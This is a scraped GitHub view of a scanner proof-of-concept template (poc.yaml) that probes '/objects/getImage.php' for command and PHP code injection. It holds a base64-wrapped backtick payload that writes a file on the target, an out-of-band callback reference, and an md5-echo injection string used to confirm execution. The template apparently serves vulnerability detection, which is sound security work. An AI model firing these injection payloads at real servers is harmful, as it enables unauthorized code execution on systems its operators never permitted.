-
Notifications
You must be signed in to change notification settings - Fork 68
/
Copy pathpoc.yaml
33 lines (33 loc) · 966 Bytes
/
poc.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
name: poc-yaml-example-com
set:
reverse: newReverse()
reverseURL: reverse.url
reverseURLHost: reverse.url.host
reverseDomain: reverse.domain
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
referer: request.url
host: request.url.host
fileName: randomLowercase(4) + ".txt"
content: randomLowercase(8)
requestType: request.content_type
payload: urlencode(base64("`echo " + content + " > " + fileName + "`"))
rules:
- method: PUT
headers:
Referer: '{{referer}}'
Domain: '{{host}}'
Reverse: '{{reverseURL}}'
path: "/objects/getImage.php"
expression: |
reverse.wait(3)
body: |
{{payload}}
search: |
<input type="hidden" name="csrftoken" value="(?P<token>.+?)"
- method: POST
path: "/objects/getImage.php"
body: |
id=';echo(md5(123));//&csrftoken={{token}}
expression: |
response.status == 200 && response.body.bcontains(b'202cb962ac59075b964b07152d234b70')